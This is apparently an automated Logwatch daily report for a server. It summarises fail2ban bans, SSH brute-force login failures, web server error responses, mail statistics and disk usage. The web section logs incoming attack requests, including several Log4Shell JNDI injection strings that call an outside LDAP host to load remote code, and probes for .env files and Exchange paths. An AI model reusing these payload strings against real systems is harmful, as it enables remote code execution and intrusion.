################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Sun Dec 19 04:42:04 2021 Date Range Processed: yesterday ( 2021-Dec-18 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 31:31 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 195.189.96.245 -> 91.200.100.126:4444: 1 Time(s) A total of 7 sites probed the server 103.153.76.212 139.59.30.25 216.238.73.231 34.77.162.18 5.188.210.227 61.219.11.151 66.240.205.34 Requests with error response codes 400 Bad Request null: 42 Time(s) /: 14 Time(s) \x5Cxbf\x5Cx02\x5Cx00\x5Cx88\x5Cx13\x5Cx00 ... \x5Cx9e\x5Cx16E: 4 Time(s) xmlns:xsd=\x22http://www.w3.org/2001/XMLSchema\x22: 3 Time(s) mstshash=Domain: 2 Time(s) !\xF0JU\x19\xD5\xE4\xDA\xD7v\xBFw\x9C\xBB\x98\x84\xB4Ls: 1 Time(s) &}\xBA[w}u\xA43\x9A\x823\xEEuz;f\xEAg|\xB7 ... C0$\x13\x05\xC0: 1 Time(s) )FQ\x09\xF2A}\xDEpF\xEC\xB7\x9E6\x99\xA9\x ... C0\xAE\xC0+\xC0: 1 Time(s) /c/version.js: 1 Time(s) /flu/403.html: 1 Time(s) /stalker_portal/c/version.js: 1 Time(s) /stream/live.php: 1 Time(s) /streaming/clients_live.php: 1 Time(s) /system_api.php: 1 Time(s) 1\x0F\x9E\xDA4\xAFU\xA8h\xDC\x0F\xEB\x9D?\ ... C\x04\xF8\xF97Q: 1 Time(s) 2\x7F\xC4\x94\x9E\xF6v\xD5\xCC\x97\xB7\xB2 ... x09\xC0\x13\xC0: 1 Time(s) 91.200.100.126:4444: 1 Time(s) E\x98\x07\xC5\xAA\x87\xD5\xB7\xCAg\x1AU\xC ... D\x12\xFBaU\xA1: 1 Time(s) F7lV\xFC;SniD=,2\xF9:\x88\xC9Y\xD2k\xBD: 1 Time(s) G=\xC9\xA0\xF77\xF9\xEE\xDF\xD3,\x14l\xA1\ ... C\x00<\x00/\x00: 1 Time(s) G\xC3\x00\xAC: 1 Time(s) I\xD9M\xDB9\x04v/A\xC6\xC6\xD4\x01%\xA4\xF ... x09\xC0\x13\xC0: 1 Time(s) Ih7L\xC7\x17Qr\xD4\x06sg\xD8\x9E\xBC\xB9\x ... C\x00<\x00/\x00: 1 Time(s) K\xC8\x94\x1E\x09\xC4\xDF: 1 Time(s) Lo}\x0F'Z\x12\x96Di\xE0\x8F\xA4\x19\xE9jNC ... x09\xC0\x13\xC0: 1 Time(s) U\xBC\x9Ak\x88\x9Ad\x1C0\xEB\x0E: 1 Time(s) Wr\xD1+a\x17\x8C&\x88\xE2\xBA\xC1\x8C\xBC\ ... 9\xBC2\xB1}\xEF: 1 Time(s) \x01\xA7\xE3\xDB\x09K}\x96\x96\x1B\x8B8\x9 ... C0\xAE\xC0+\xC0: 1 Time(s) \x06f\xB9\x13f\xFF\x08R\xA6\xAC\x85: 1 Time(s) \x09\xBF\x98\x02\x1Cx\x02H\xD7\x8C7)\xEC\x ... x09\xC0\x13\xC0: 1 Time(s) \x0C\x8A\x10\xC6\x80\xC7Y-\xB9\xA7\xF4\xF6 ... xEB\xC5\x80\x82: 1 Time(s) \x1A\x82\xC96]\x8A}sv\xE9H\xCF^\xC4|\x015\xE4b\xBE: 1 Time(s) \x80\xC7\x87\xA1\x04\xC0\xAF\x92\x98\xC2\x ... x13\xC0\x11\x00: 1 Time(s) \x8E\xD4\x1A\xCE\xC8\xDA\xD4LG\xC0F\xABa\x ... 1\x16\xD7{\xD38: 1 Time(s) \x97\x05\xFD\xE7\x17<\x94N\x16v\x812\xF6\x ... x09\xC0\x13\xC0: 1 Time(s) \x98\xD7\xD1h\xB7\x101\x8B\x9A;Q(z\xD0\xC7\xEE\x8A\xA3: 1 Time(s) \x9A\x0FR\xA3,_\xE3E\xA2\xF8\xFF\xAC&\xCEm ... x8F\x99\x9A\x05: 1 Time(s) \xA0\x94\x0B\x1D\xDF: 1 Time(s) \xA0wj\x9A^\xF4\xA6_\x1A\x9A\xB3\xA6\xC1\x ... x09\xC0\x13\xC0: 1 Time(s) \xA17\xC9\xA6U\x01\xCA!\xA1\xBFp[8xj\xF6l\ ... x09\xC0\x13\xC0: 1 Time(s) \xAB\x9Eq\x98: 1 Time(s) \xB1\x04e\x80\xB3\x1E\x1E\x5C\xCD\x07H\x88 ... 90\x9B\xB3\xC3Y: 1 Time(s) \xB1\x88\x84\xE2\xE4]\xE4\xE5\xB9\xB5JO\xA ... C0\xAE\xC0+\xC0: 1 Time(s) \xB2\xF0u\x08\xF0(w?>L\x0Et7j\x90: 1 Time(s) \xB6\xC0\xD2!\xD3\x141\xC4#\x8D\x80\xCBI\x ... x13\xC0\x11\x00: 1 Time(s) \xB9\xDB\xF6\x1F\xA8\x86\x15d\x12\xAA\xCA\ ... C0\xAE\xC0+\xC0: 1 Time(s) \xBC\x1A\xBC\x8BB\x02GP\x86M\x04\x82\x84\x ... C0\xAD\xC0$\xC0: 1 Time(s) \xBC\xAAw\xFDP\xCD\xEEd\x88\xF3\x18\xC9\x7 ... x09\xC0\x13\xC0: 1 Time(s) \xC2\xD2\xA2XB\xB4E\xDDh5\x22\xAD\xAB\xE5: 1 Time(s) \xCC\xACJ\x15\xB9\xA3\x22u\xE2\x9F\xC1\x0B ... x09\xC0\x13\xC0: 1 Time(s) \xD2\xC0\x7F\x0C\xB2\x88\xB2\x86\x10Q\x98y ... x1D\xD9\xBF\xB3: 1 Time(s) \xD6\xA6K\xC3\xC2\x99\xC4v\xDE\x99\x1A\xFF ... x09\xC0\x13\xC0: 1 Time(s) \xD7\x0BA\x1F\xE4\xC5\xFE\x03\x0F\x04q<\xC ... C0\xAE\xC0+\xC0: 1 Time(s) \xD9\xC1\x98\x9B\x88x\xCAjdRR\x0F(K^\xE625 ... C0\xAE\xC0+\xC0: 1 Time(s) \xDDb/y\x1E\xC1Om\x83\xFD\xA7\x8B\x07v\xA0 ... \xFC\xD2qw\xC6>: 1 Time(s) \xE1\xB3\xA5,~\xC2\x8D\x22q\x8E\x0F\x04V`\ ... C0\xAE\xC0+\xC0: 1 Time(s) \xE89#B\xE5\xC6~\xFDL\xEE\x8C\x22G\xE4Wg\xD3\x10=\x03#\xBE: 1 Time(s) \xED\x12\x09: 1 Time(s) \xF0zP\x94~\x17\xDEmG;\x08\x86N\xA8\xEC-\x ... x13\xC0\x11\x00: 1 Time(s) \xF6\xC8\x9B\x5C\xAB\xD1\xEC\xD4\x91K\xDE\ ... x09\xC0\x13\xC0: 1 Time(s) \xF9\xA9: 1 Time(s) \xFCx\x9B\x22\xBEa@=\xF1\xE0@C\xD7\xFD\xBD ... x09\xC0\x13\xC0: 1 Time(s) ^$\x1Dv\x05\x09\xF0\xBB\xF3\xD6\xB6\xAA\xF ... x09\xC0\x13\xC0: 1 Time(s) _\x8F\x9E;\xE8|\xF6\x91\xCC&d\xD5\x85G\xFD ... x09\xC0\x13\xC0: 1 Time(s) c\xAA\x8A\x7FR\xC9s\x22\xE6\xE0D\xBD\xAB\x ... x09\xC0\x13\xC0: 1 Time(s) j\x95d\xAC'\xAD\xC4\xFCO-\xDA\x85\xD5\xC7\ ... x09\xC0\x13\xC0: 1 Time(s) j\xC6\xF5\xB4\xA8\x9E\x9Eb\x07.\xCA\x0E: 1 Time(s) s?A\x86\xB8pxnTQ\x91\xEB\x99\xA46\xA9j\xE7 ... C0\xAE\xC0+\xC0: 1 Time(s) uk\xB2\x8D!\x99\xF56\x80\xD9\xA2\xD9y\xAD, ... x09\xC0\x13\xC0: 1 Time(s) {\x0C\xC8\xE4If\xEFF~\xC6\x95\xED/\xDE\x92\xD7\xA99\xFEE\xE8: 1 Time(s) 499 (undefined) /: 5 Time(s) /${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s) /?id=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s) /?page=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s) /?s=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s) /?v=${jndi:ldap://5.101.118.127:1389/Exploit}: 1 Time(s) /login: 1 Time(s) 500 Internal Server Error /: 32 Time(s) /.env: 5 Time(s) /robots.txt: 5 Time(s) /nice%20ports%2C/Tri%6Eity.txt%2ebak: 3 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s) /?q=%hydroparastatae%&va=b&t=hc&ia=web: 1 Time(s) /Telerik.Web.UI.WebResource.axd?type=rau: 1 Time(s) /actuator/health: 1 Time(s) /admin/public/index.html: 1 Time(s) /c/version.js: 1 Time(s) /cgi-bin/config.exp: 1 Time(s) /flu/403.html: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /owa/auth/x.js: 1 Time(s) /remote/login: 1 Time(s) /stalker_portal/c/version.js: 1 Time(s) /stream/live.php: 1 Time(s) /streaming/clients_live.php: 1 Time(s) /system_api.php: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (49.234.30.113): 37 Time(s) root (111.229.4.66): 33 Time(s) root (121.4.118.208): 32 Time(s) root (203.160.55.212): 25 Time(s) root (36.91.119.221): 24 Time(s) root (120.133.56.246): 21 Time(s) root (165.22.220.159): 20 Time(s) unknown (121.4.118.208): 18 Time(s) root (139.198.4.166): 14 Time(s) root (1.116.155.182): 13 Time(s) unknown (49.234.30.113): 13 Time(s) unknown (111.229.4.66): 12 Time(s) unknown (189.180.31.18): 12 Time(s) root (201-0-89-142.dsl.telesp.net.br): 10 Time(s) unknown (120.133.56.246): 9 Time(s) unknown (165.22.220.159): 8 Time(s) unknown (201-0-89-142.dsl.telesp.net.br): 8 Time(s) unknown (36.91.119.221): 8 Time(s) unknown (139.198.4.166): 7 Time(s) unknown (203.160.55.212): 6 Time(s) root (189.180.31.18): 4 Time(s) unknown (1.116.155.182): 4 Time(s) root (112.19.174.226): 2 Time(s) root (176.111.173.226): 2 Time(s) unknown (109.166.153.103): 2 Time(s) unknown (176.111.173.226): 2 Time(s) unknown (189.195.123.28): 2 Time(s) unknown (189.230.37.114): 2 Time(s) unknown (77.118.110.71.wireless.dyn.drei.com): 2 Time(s) unknown (h-155-4-0-67.a147.priv.bahnhof.se): 2 Time(s) unknown (pasarelalora.electron.uv.es): 2 Time(s) postgres (139.198.4.166): 1 Time(s) root (164.90.203.55): 1 Time(s) root (189.195.123.28): 1 Time(s) unknown (134.236.247.145): 1 Time(s) unknown (141.98.10.202): 1 Time(s) unknown (146.185.79.101): 1 Time(s) unknown (23.154.177.4): 1 Time(s) Invalid Users: Unknown Account: 123 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 10.358K Bytes accepted 10,607 10.358K Bytes sent via SMTP 10,607 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 2 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 2 Total 4xx Rejects 100.00% ======== ================================================== 14 Connections 5 Connections lost (inbound) 14 Disconnections 1 Removed from queue 1 Sent via SMTP ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Failed logins from: 1.116.155.182: 13 times 36.91.119.221: 24 times 49.234.30.113: 37 times 111.229.4.66: 33 times 112.19.174.226: 2 times 120.133.56.246: 21 times 121.4.118.208: 32 times 139.198.4.166: 15 times 164.90.203.55: 1 time 165.22.220.159: 20 times 176.111.173.226: 2 times 189.180.31.18 (dsl-189-180-31-18-dyn.prod-infinitum.com.mx): 4 times 189.195.123.28 (customer-PUE-123-28.megared.net.mx): 1 time 201.0.89.142 (201-0-89-142.dsl.telesp.net.br): 10 times 203.160.55.212: 25 times Illegal users from: 2001:470:1:332::9: 1 time undef: 85 times 1.116.155.182: 4 times 2.57.121.35 (smtp35.kcmoa.com): 1 time 23.154.177.4: 1 time 36.91.119.221: 8 times 49.234.30.113: 13 times 64.62.197.122: 1 time 77.118.110.71 (77.118.110.71.wireless.dyn.drei.com): 2 times 109.166.153.103: 2 times 111.229.4.66: 12 times 120.133.56.246: 9 times 121.4.118.208: 18 times 134.236.247.145: 1 time 139.198.4.166: 7 times 141.98.10.202: 1 time 146.185.79.101: 1 time 147.156.82.79 (pasarelalora.electron.uv.es): 2 times 155.4.0.67 (h-155-4-0-67.A147.priv.bahnhof.se): 2 times 165.22.220.159: 8 times 176.111.173.226: 2 times 189.180.31.18 (dsl-189-180-31-18-dyn.prod-infinitum.com.mx): 12 times 189.195.123.28 (customer-PUE-123-28.megared.net.mx): 2 times 189.230.37.114 (dsl-189-230-37-114-dyn.prod-infinitum.com.mx): 2 times 201.0.89.142 (201-0-89-142.dsl.telesp.net.br): 8 times 203.160.55.212: 6 times **Unmatched Entries** Protocol major versions differ for 216.238.73.231: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 2 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################